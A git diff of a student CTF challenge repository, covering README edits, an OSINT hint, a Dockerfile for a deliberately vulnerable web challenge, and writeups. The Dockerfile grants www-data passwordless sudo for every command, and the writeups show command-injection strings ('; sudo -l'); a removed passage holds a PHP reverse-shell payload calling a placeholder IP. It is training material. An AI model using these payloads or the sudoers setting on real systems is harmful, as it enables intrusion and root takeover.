Compare commits
29 Commits
GZ---Chall
...
main
| Author | SHA1 | Date | |
|---|---|---|---|
|
83299e9667 | ||
|
|
6eb5ba99bc | ||
|
|
81fb469d2b | ||
|
|
9e66610767 | ||
|
|
e8d6447641 | ||
|
|
f978b5d270 | ||
|
|
d836f6829d | ||
|
|
f3f37f739d | ||
|
|
88c4da9134 | ||
|
|
b63400a533 | ||
|
|
b823986aa6 | ||
|
|
e35fcae2a4 | ||
|
|
2733c1580f | ||
|
|
2570e5a3ea | ||
|
|
bac884ab35 | ||
|
|
c9b9f5f7bb | ||
|
|
9883f29b4d | ||
|
|
6560736ca9 | ||
|
|
922ef0f751 | ||
|
|
0523862140 | ||
|
|
fadfaafa87 | ||
|
|
33f7ce12ac | ||
|
|
9e6f884fcb | ||
|
|
209bd5f1fa | ||
|
|
4e0a0210dd | ||
|
|
b786d54aa3 | ||
|
|
7b94d61258 | ||
|
|
ac86a16cc4 | ||
|
|
cb74ef376c |
@@ -1,3 +1,5 @@
|
||||
# GiTxHextech-Challenge-Repo
|
||||
|
||||
This will be the repo for submitted challenges, view folder to see accepted categories
|
||||
This is the challenge repository of the CTF challenges that were used during the CTF competition held in RP.
|
||||
|
||||
For any repo/general CTF questions, please PM malkbr3d on Discord
|
||||
|
||||
4
challenges/README.md
Normal file
4
challenges/README.md
Normal file
@@ -0,0 +1,4 @@
|
||||
## Information
|
||||
|
||||
writeup.md consists of solutions from the respective challenge authors.
|
||||
readme.md holds overall general information about the challenge.
|
||||
@@ -1,3 +0,0 @@
|
||||
This dir contains challenges that are related to blockchain
|
||||
|
||||
##### note: am aware that most (or all idk) are not familiar with blockchain category, however due to the nature of the CTF(open to all SOI body), we will try to be inclusive. If there are no submitted blockchain challenges, this category will be removed as a whole.
|
||||
@@ -2,7 +2,7 @@ From the description, a location name is hidden using a secret phrase.
|
||||
- Grab the 3 words mentioned in capital letters in the description.
|
||||
- Give the 3 words in what3words site url or in the search box (https://what3words.com/treasured.island.quest)
|
||||
|
||||
The location of the place is shown at the bottom.
|
||||
The location of the place is shown at the bottom. (flag is in the search result)
|
||||
|
||||
<img width="298" alt="image" src="https://github.com/lenebread/GiTxHextech-Challenge-Repo/assets/166520861/70a27c50-f138-404b-8b08-350ac2e689f7">
|
||||
<img width="931" alt="image" src="https://github.com/lenebread/GiTxHextech-Challenge-Repo/assets/166520861/85c4ce53-3468-49f0-93d0-1f6ad217a544">
|
||||
|
||||
@@ -8,7 +8,7 @@ RUN echo "HEX{N3tw0rK_ErR_500_W1kS2kKiL}" > /root/flag.txt
|
||||
RUN chown www-data:www-data /var/www/
|
||||
|
||||
# Add www-data to sudoers file for vim command
|
||||
RUN echo 'www-data ALL=(ALL) NOPASSWD:/usr/bin/vim' >> /etc/sudoers
|
||||
RUN echo 'www-data ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
|
||||
|
||||
# Copy the PHP script to the /var/www/html directory
|
||||
COPY index.php /var/www/html/index.php
|
||||
@@ -19,4 +19,4 @@ RUN sed -i 's/80/52002/g' /etc/apache2/ports.conf /etc/apache2/sites-available/0
|
||||
# Start apache2 and cron in the foreground
|
||||
CMD service apache2 start && cron -f
|
||||
|
||||
EXPOSE 52002
|
||||
EXPOSE 52002
|
||||
|
||||
@@ -7,7 +7,7 @@ Check out this simple HTTP status checker I made!
|
||||
- Author: Goh Zavier
|
||||
- Discord Username: gzavz
|
||||
- Category: Web
|
||||
- Diffculty: Medium
|
||||
- Diffculty: Easy
|
||||
|
||||
## Hints
|
||||
|
||||
|
||||
Binary file not shown.
|
Before Width: | Height: | Size: 6.5 KiB After Width: | Height: | Size: 25 KiB |
Binary file not shown.
|
Before Width: | Height: | Size: 20 KiB After Width: | Height: | Size: 14 KiB |
Binary file not shown.
|
Before Width: | Height: | Size: 25 KiB After Width: | Height: | Size: 14 KiB |
Binary file not shown.
|
Before Width: | Height: | Size: 48 KiB |
Binary file not shown.
|
Before Width: | Height: | Size: 33 KiB |
@@ -8,38 +8,16 @@ Entering a semi-colon (;) will break the command. We can try to use the payload
|
||||
|
||||
|
||||
|
||||
We can attempt to spawn a reverse shell by first having netcat listen on our desired port. In this example, the port will be 45101 and the netcat command will be ``nc -nlvp 45101`` as seen in the following screenshot.
|
||||
We can attempt to use the command ``; sudo -l``. We can see that we are able to run any command as sudo without a password as seen in the followings screenshot.
|
||||
|
||||
|
||||
|
||||
|
||||
Once its listening on the port, we can use the following payload to spawn the reverse shell. Replace "YOUR-IP-HERE" with your IP address.
|
||||
We can attempt to use the command ``; sudo ls /root/`` to list the root directory. We can see that there is a file called ``flag.txt`` as seen in the following screenshot.
|
||||
|
||||
```
|
||||
; php -r '$sock=fsockopen("YOUR-IP-ADDRESS",45101);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
```
|
||||
|
||||
|
||||
Input the above payload into the input box as seen in the following screenshot.
|
||||
We can read the contents of the file by using the command ``cat /roo/flag.txt``.
|
||||
|
||||
|
||||
|
||||
|
||||
Click on the "Check HTTP Status" and observe that the website has hung. Return to the netcat session and observe that we have gotten a shell as seen in the following screenshot.
|
||||
|
||||
|
||||
|
||||
We can spawn an interactive shell using the command ``script -qc /bin/bash /dev/null``. Once done, we can explore the system. We can use the command ``sudo -l`` and see that we can run the command ``vim`` as root without a password as seen in the following screenshot.
|
||||
|
||||
|
||||
|
||||
Using GTFOBins, we are able to breakout and obtain a shell as a root user using the following command:
|
||||
|
||||
```
|
||||
vim -c ':!/bin/sh'
|
||||
```
|
||||
|
||||
Using the command ``whoami`` we can see that we are now the root user as seen in the following screenshot.
|
||||
|
||||
|
||||
|
||||
We can obtain the flag in the root directory by using the command ``cd /root`` and ``cat flag.txt``.
|
||||
|
||||
The flag is ``HEX{N3tw0rK_ErR_500_W1kS2kKiL}``.
|
||||
The flag is: ``HEX{N3tw0rK_ErR_500_W1kS2kKiL}``
|
||||
|
||||
BIN
challenges/web/web warm-up/images/img-1.png
Normal file
BIN
challenges/web/web warm-up/images/img-1.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 23 KiB |
BIN
challenges/web/web warm-up/images/img-2.png
Normal file
BIN
challenges/web/web warm-up/images/img-2.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 19 KiB |
23
challenges/web/web warm-up/writeup.md
Normal file
23
challenges/web/web warm-up/writeup.md
Normal file
@@ -0,0 +1,23 @@
|
||||
This challenge requires you to view source of the HTML pages. There are two ways to complete this.
|
||||
|
||||
# First Method
|
||||
|
||||
Navigate to the challenge link. We are provided with a site that says to read the description again. Alternatively, we can also view the page source and see that there is a hidden text that links to another page called "why.html" as seen in the following screenshot.
|
||||
|
||||
|
||||
|
||||
Once on the "why.html" page, we are given a hint as to how we can obtain the flag.
|
||||
|
||||
Viewing the page source again and we are able to see that our flag is hidden on the page as seen in the following screenshot.
|
||||
|
||||
|
||||
|
||||
The flag is: ``HEX{B@s1c_w3B_012siXJv}``
|
||||
|
||||
# Second Method
|
||||
|
||||
Reading the description, we can see that there is a text called ``why.html``. This can be a hint and we can attempt to navigate to the page called ``why.html``.
|
||||
|
||||
Upon navigating to it, we are given a hint as to how we can obtain the flag. We can obtain it by viewing the page source.
|
||||
|
||||
The flag is: ``HEX{B@s1c_w3B_012siXJv}``
|
||||
Reference in New Issue
Block a user